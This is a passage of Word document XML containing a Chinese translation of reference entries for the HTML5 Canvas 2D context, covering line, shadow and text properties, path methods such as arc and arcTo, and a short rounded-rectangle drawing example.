        <w:t>"destination-over"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"copy"</w:t>
      </w:r>
      <w:r>
        <w:t>。可参考上面的合法值表格。注意，在编写本书时，不同的浏览器对特定的合成模式有不同的实现：一些合成是局部的，一些是全局的。更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>21.4.13</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string lineCap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lineCap</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义线条末端的样式。只有在画粗线条时这个属性才有</w:t>
      </w:r>
      <w:r>
        <w:t>用。它可用的值在下面的表格中列出了，默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"butt"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251749376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4106173" cy="1237890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="94" name="00094.jpeg" descr="000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4.jpeg" descr="00094.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4106173" cy="1237890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string lineJoin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果路径中有线段和</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>或曲线的顶点相交，这些交点的绘制方式由</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义。这个属性仅当绘制的是宽线条时才有效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"miter"</w:t>
      </w:r>
      <w:r>
        <w:t>，表示两根线条的外部边缘将延伸直到它们相交。如果两条线条以一个锐角斜接，它们的交合部分可能就会很长，</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义这个交合部分的长度上限，如果交合部分长于这个限制，它将转化为一个斜面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性值</w:t>
      </w:r>
      <w:r>
        <w:t>"round"</w:t>
      </w:r>
      <w:r>
        <w:t>定义交合部分顶点的外边缘为一段实心圆弧</w:t>
      </w:r>
      <w:r>
        <w:t>，直径与线条的宽度相等。属性值</w:t>
      </w:r>
      <w:r>
        <w:t>"bevel"</w:t>
      </w:r>
      <w:r>
        <w:t>定义交合部分顶点的外边缘为一个实心的三角形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double lineWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定义描边（或画线）操作时的线条宽度。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。线条的中心在路径上，路径两边各占一半宽度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double miterLimit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"miter"</w:t>
      </w:r>
      <w:r>
        <w:t>，并且两条线以一个锐角斜交，那么它们的交合部分可能会很长。如果这个斜交的部分太长，看起来就会很不谐调。</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置斜交部分长度的上限。这个值定义斜交部分长度与线条宽度的一半之间的比例，默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>，即斜</w:t>
      </w:r>
      <w:r>
        <w:t>交部分的长度不会超过线条宽度的</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>倍。如果两条线条的斜交部分的长度比</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>允许的最大值要长，这两条线条将以斜面而不是斜接的方式连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double shadowBlur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义阴影的模糊程度。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，将生成边缘清晰的阴影。取值越大模糊程度也越大，不过需要注意，这个值的单位不是像素，也不受当前变换的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string shadowColor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义阴影的颜色，格式同</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>颜色格式。默认情况下是透明的黑色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>double shadowOffsetX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double shadowOffsetY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义阴影的横向和纵向偏移量。取值越大，产生阴影的对象看起来就像在背景上漂得越高。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。这两个值与坐标空间的单位相同，依赖于当前变换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>any strokeStyle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义描边（或绘制）路径的颜色、图案或渐变。这个属性的值可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>颜色字符串，也可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string textAlign</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义文本的水平对齐方式，其对应的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标值会传递给</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>。允许的值有</w:t>
      </w:r>
      <w:r>
        <w:t>"left"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"center"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"righ</w:t>
      </w:r>
      <w:r>
        <w:t>t"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"end"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"end"</w:t>
      </w:r>
      <w:r>
        <w:t>的含义取决于当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:t>（文字方向）属性。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string textBaseline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义文本的垂直对齐方式，其对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标值会传递给</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>。允许的值有</w:t>
      </w:r>
      <w:r>
        <w:t>"top"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"middle"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"bottom"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"a</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>lphabetic"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"hanging"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"ideographic"</w:t>
      </w:r>
      <w:r>
        <w:t>。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"alphabetic"</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void arc(double x,y,radiu</w:t>
      </w:r>
      <w:r>
        <w:t>s,startAngle,endAngle,[boolean anticlockwise])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法根据指定的圆心及半径在画布的当前子路径上绘制一段圆弧。该方法的前三个参数指定一个圆的圆心及半径，接下来两个参数定义这个圆上的一段圆弧的起点及终点的角度，角度的单位为弧度制。沿着</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴正向的</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>点钟方向是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>，沿顺时针方向角度增加。最后一个参数定义是角度是沿圆周的逆时针方向（</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>）还是顺时针方向（</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或省略）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用这个方法会在先在当前路径中的当前点与圆弧起点之间添加一条直线，然后再添加圆弧本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>vo</w:t>
      </w:r>
      <w:r>
        <w:t>id arcTo(double x1,y1,x2,y2,radius)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在当前子路径中添加一条直线和一个圆弧，并以某种方式描述圆弧，从而使它在为多边形添加圆角时特别有用。参数</w:t>
      </w:r>
      <w:r>
        <w:t>x1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>y1</w:t>
      </w:r>
      <w:r>
        <w:t>定义点</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>，参数</w:t>
      </w:r>
      <w:r>
        <w:t>x2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>y2</w:t>
      </w:r>
      <w:r>
        <w:t>定义点</w:t>
      </w:r>
      <w:r>
        <w:t>P2</w:t>
      </w:r>
      <w:r>
        <w:t>，添加到路径中的圆弧是一个半径为</w:t>
      </w:r>
      <w:r>
        <w:t>radius</w:t>
      </w:r>
      <w:r>
        <w:t>的圆的一部分。圆弧上有一点与当前点到</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的连线</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>相切，一点与</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>P2</w:t>
      </w:r>
      <w:r>
        <w:t>之间的连线相切。这两个相切点也是圆弧的起点及终点，绘制的圆弧为连接这两个点的最短圆弧。在添加圆弧到路径中之前，这个方法先从当前点到圆弧的起点添加一条直线。调用这个方法后</w:t>
      </w:r>
      <w:r>
        <w:t>，当前点将位于圆弧的终点位置，在</w:t>
      </w:r>
      <w:r>
        <w:t>P1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>P2</w:t>
      </w:r>
      <w:r>
        <w:t>之间的连线上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定一个上下文对象</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>，可以用类似下面的代码来绘制一个</w:t>
      </w:r>
      <w:r>
        <w:t>100×100</w:t>
      </w:r>
      <w:r>
        <w:t>的圆角（多个半径）矩形：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.beginPath();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(150,100);//</w:t>
      </w:r>
      <w:r>
        <w:t>在顶部边线的中间开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(200,100,200,200,40);//</w:t>
      </w:r>
      <w:r>
        <w:t>画顶部的边线以及右上角圆角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(200,200,100,200,30);//</w:t>
      </w:r>
      <w:r>
        <w:t>画右部的边线以及右下角圆角（小一点）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(100,200,100,100,20);//</w:t>
      </w:r>
      <w:r>
        <w:t>画底部的边线以及左下角</w:t>
      </w:r>
      <w:r>
        <w:t>圆角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.arcTo(100,100,200,100,10);//</w:t>
      </w:r>
      <w:r>
        <w:t>画左部的边线以及左上角圆角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>回到起点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void beginPath()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>丢弃当前定义的路径并开始一条新的路径。调用</w:t>
      </w:r>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>之后没有当前点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>首次创建画布的上下文时，</w:t>
      </w:r>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>会隐含地调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void bezierCurveTo(double cpx1,cpy1,cpx2,cpy2,x,y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bezierCurveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>添加一条三次贝塞尔曲线到画布的当前子路径中。曲线的起点是画布的当前点，终点是</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>，两个贝塞尔控制点</w:t>
      </w:r>
      <w:r>
        <w:t>(cpX1,cpY1)</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>(cpX2,cpY2)</w:t>
      </w:r>
      <w:r>
        <w:t>定义曲线的形状。当这个方法返回时，当前点是</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clearRect(double x,y,width,height)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clearRect()</w:t>
      </w:r>
      <w:r>
        <w:t>使用透明黑色填充指定的矩形区域。不像</w:t>
      </w:r>
      <w:r>
        <w:t>rect()</w:t>
      </w:r>
      <w:r>
        <w:t>，它不会影响当前点或当前路径。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clip()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法计算当前路径和当前裁剪区域中的相交部分，并将这个较小的区域作为新的裁剪区域返回。注意裁剪区域是没法扩大的，如果你只是想要一个临时的裁剪区域，你应该先调用</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>保存当前状态，以便迟些调用</w:t>
      </w:r>
      <w:r>
        <w:t>restore()</w:t>
      </w:r>
      <w:r>
        <w:t>恢复为之前的状态。画布默认的裁剪区域为画布自身的矩形区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>将所有子路径视为关闭，并使用非零环绕规则来判定路径的内部与外部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void closePath()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果当前画布的子路径未闭合，</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>会通过在当前点与这条子路径的第一个点之间添加一条连</w:t>
      </w:r>
      <w:r>
        <w:t>线来闭合它，并（就像调用</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>一样）在同一个点开始一条新的子路径。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
